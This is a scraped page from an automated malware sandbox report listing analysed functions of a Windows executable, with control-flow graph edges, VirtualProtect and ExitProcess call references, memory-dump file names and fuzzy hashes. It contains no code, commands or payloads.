                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                    • Instruction ID: 8ad00d06e6d220283ac6635a1fe9b6b26238995bdaf4142d6a6f827a83d18564
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F9144B2D092199FFB208A10DC85AE777B8EB85310F1441FBD84E56281D67D5FC68FA2
                                                                                                                                                                                                                                                                                    Function 0044F4E4 Relevance: 1.8, APIs: 1, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 93b5dd32ced10469b956e73ebfcaa8495d9fb8462cf5040a2ffc015a48a21a59
                                                                                                                                                                                                                                                                                    • Instruction ID: a3718a56033c99e2bdd42d34cfea96cca9adf463ae2650c0b4dcba38067c4651
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93b5dd32ced10469b956e73ebfcaa8495d9fb8462cf5040a2ffc015a48a21a59
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57A118B1E082989AF7208625DC44BDB7AB5EF51304F0480FAD44D57282DA7E5FC98F66
                                                                                                                                                                                                                                                                                    Function 0044EE02 Relevance: 1.8, APIs: 1, Instructions: 258memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 461 44ee02-44ee17 463 44ee28-44ee48 call 44ee47 461->463 464 44ee19-44ee23 461->464 465 44f0e4-44f11d 463->465 464->465 467 44f160-44f1be call 44f179 465->467 468 44f11f-44fcbc VirtualProtect 465->468 477 44f1c0-44f1cc 467->477 478 44f1d1-44f1e6 467->478 475 44fcfc-44fd02 468->475 476 44fcbe-44fcfa 468->476 479 44fd08-44fd0f 475->479 476->479 480 44f4c2-44f4c9 477->480 481 44f1e8-44f1f4 478->481 482 44f1f9-44f218 478->482 483 44fd11-44fd43 call 44fd24 call 44fd3f 479->483 484 44fd48-44feec call 44feed 479->484 488 44f59d-44f5a8 call 44f5ab 480->488 489 44f4cf-44f4e3 call 44f4e4 480->489 481->480 486 44f21a-44f226 482->486 487 44f22b-44f23d 482->487 506 450291-45068a call 45036d call 450673 483->506 484->506 486->480 492 44f250-44f2b9 487->492 493 44f23f-44f24b 487->493 489->488 503 44f4b6-44f4bc 492->503 504 44f2bf-44f309 492->504 493->480 503->480 507 44f31a-44f32b 504->507 532 450690-450804 call 450805 506->532 533 450f9c-4510ac call 450fac call 450fc2 call 4510bb 506->533 510 44f331-44f341 507->510 511 44f3cc-44f3ec call 44f3ee 507->511 510->511 515 44f347-44f398 call 44f366 510->515 511->503 525 44f3be 515->525 526 44f39a-44f3bc 515->526 525->507 526->525 529 44f3c5 526->529 529->511
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 73b646848fde8b0a18d1dae2daf155659251c17dfbe4a902db16c48a77b49ac6
                                                                                                                                                                                                                                                                                    • Instruction ID: 889d3d5979365ffcc2759f7117510698b580ba284569ca754c7a982f090c5807
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73b646848fde8b0a18d1dae2daf155659251c17dfbe4a902db16c48a77b49ac6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EA128B1D082988AF7248624DC44BEB7BB5EF51314F1480FAD44D57282DA7E4FCACB66
                                                                                                                                                                                                                                                                                    Function 00450B81 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 0 450b81-450bbd 1 450bd0-450be5 0->1 2 450bbf-450bcb 0->2 4 450be7-450bf3 1->4 5 450bf8-450c17 1->5 3 450ec1-450ec8 2->3 8 450f9c-4510ac call 450fac call 450fc2 call 4510bb 3->8 9 450ece-450f1c call 450f1d 3->9 4->3 6 450c19-450c25 5->6 7 450c2a-450c3c 5->7 6->3 11 450c4f-450cb8 7->11 12 450c3e-450c4a 7->12 9->8 17 450eb5-450ebb 11->17 18 450cbe-450d2a 11->18 12->3 17->3 22 450d30-450d40 18->22 23 450dcb-450e1c call 450df3 18->23 22->23 25 450d46-450d79 call 450d6e 22->25 33 450e1e-450e28 23->33 34 450e2a-450e81 23->34 25->23 38 450e99-450ea0 33->38 35 450e83-450e8d 34->35 36 450e8f 34->36 35->38 36->38 40 450eb0 38->40 41 450ea2-450eae 38->41 40->3 41->3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: W
                                                                                                                                                                                                                                                                                    • API String ID: 0-3182507374
                                                                                                                                                                                                                                                                                    • Opcode ID: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                    • Instruction ID: 4591ab11f7caf88b64320bdd8c74d2c4f26aad70e31dbd3bf6e540ed2521be35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12B19BB5D042288FEB64CB14CC84BEABBB5FB84315F1440EAD80967342DA39AED5CF41
                                                                                                                                                                                                                                                                                    Function 00450F1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 42 450f1d-450f59 45 450f9c-4510ac call 450fac call 450fc2 call 4510bb 42->45 46 450f5b-450f62 42->46 47 450f68 call 450f77 46->47 49 450f6d-450f76 47->49 49->45
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID: W
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-3182507374
                                                                                                                                                                                                                                                                                    • Opcode ID: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                    • Instruction ID: 9ddd6951fc924a91401a4bf615135f3147cac00f1cf5976cceabd4da6fbd5488
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A141F6F6D042249FF7209A10DC85BEB7B78EB84311F0540BBE90D96281D67D6EC58E62
                                                                                                                                                                                                                                                                                    Function 0044FBC9 Relevance: 1.8, APIs: 1, Instructions: 250memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 550 44fbc9-44fbec 551 44fbee-44fbf8 550->551 552 44fbfa-44fc51 550->552 553 44fc69-44fc70 551->553 558 44fc53-44fc5d 552->558 559 44fc5f 552->559 556 44fc80 553->556 557 44fc72-44fc7e 553->557 560 44fc91-44fcbc VirtualProtect 556->560 557->560 558->553 559->553 562 44fcfc-44fd02 560->562 563 44fcbe-44fcfa 560->563 564 44fd08-44fd0f 562->564 563->564 565 44fd11-44fd43 call 44fd24 call 44fd3f 564->565 566 44fd48-44feec call 44feed 564->566 575 450291-45068a call 45036d call 450673 565->575 566->575 587 450690-450804 call 450805 575->587 588 450f9c-4510ac call 450fac call 450fc2 call 4510bb 575->588
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                    • Instruction ID: 4688688dd30b72f27e1b35f0a31bd08ad5d8ec2608884f7fd3f61d24e9d7606b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51A1D871D085A88AFB248724DC447EA7BB5EF51304F1480FAC84D57282DA7E5FC98F66
                                                                                                                                                                                                                                                                                    Function 00438DD7 Relevance: 1.7, APIs: 1, Instructions: 240memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 605 438dd7-438ded 607 438def-438df9 605->607 608 438dfe-438e49 605->608 609 4390a5-4390de call 4390c5 607->609 616 438e4b-438e55 608->616 617 438e5a-43903b call 438f73 608->617 620 439121-43948a call 43913c 609->620 621 4390e0-43911c 609->621 616->609 617->609 636 439490-43951b 620->636 637 43955e-439c43 call 4395e6 call 4398ff call 439918 620->637 626 439c49-439ca6 call 439c6b VirtualProtect 621->626 640 439ca8-439ce6 626->640 641 439cee-439d40 call 439d41 626->641 636->637 660 43951d-439559 call 43954b 636->660 637->626 640->641 660->626
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                    • Instruction ID: a4a4f988380392004f738fe2286c6b575df809d38f264b81318ed9f9701a64e0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D58115B2D046289BF7248B14DC84AEBB774FF84310F1151BAE84D67280E67D5FC68E96
                                                                                                                                                                                                                                                                                    Function 00439540 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 671 439540-439ca6 call 439c6b VirtualProtect 676 439ca8-439ce6 671->676 677 439cee-439d40 call 439d41 671->677 676->677
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
